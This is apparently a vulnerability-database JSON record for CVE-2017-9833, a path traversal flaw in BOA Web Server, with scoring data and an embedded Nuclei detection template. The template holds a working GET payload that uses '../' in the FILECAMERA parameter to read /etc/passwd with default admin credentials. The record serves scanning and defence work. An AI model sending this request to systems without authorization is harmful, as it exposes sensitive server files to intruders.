{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2017-9833/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2017-9833/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2017-9833/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2017-9833/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2017-9833/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2017-9833"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2017-9833"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.68464,
      "kev": false,
      "percentile": 0.99303
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2017/CVE-2017-9833.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2017-9833\n\ninfo:\n  name: BOA Web Server 0.94.14 - Arbitrary File Access\n  author: 0x_Akoko\n  severity: high\n  description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of \"../..\" using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials.\n  impact: |\n    An attacker can gain unauthorized access to sensitive files on the server.\n  remediation: |\n    Upgrade to a patched version of BOA Web Server or apply the necessary security patches.\n  reference:\n    - https://www.exploit-db.com/exploits/42290\n    - https://nvd.nist.gov/vuln/detail/CVE-2017-9833\n    - https://pastebin.com/raw/rt7LJvyF\n    - https://www.exploit-db.com/exploits/42290/\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2017-9833\n    cwe-id: CWE-22\n    epss-score: 0.68464\n    epss-percentile: 0.99302\n    cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: boa\n    product: boa\n  tags: cve,cve2017,boa,lfr,lfi,edb,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:[x*]:0:0\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100cbab23fdd26c8ed67e07d5ea1b48ad03b6e84e4c45824fa7ea6e650581ff5b4e022100e22338e71d36182780a5f72c51ecfe782175c1a46c82096268c17511fe17b81f:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2017-9833"
}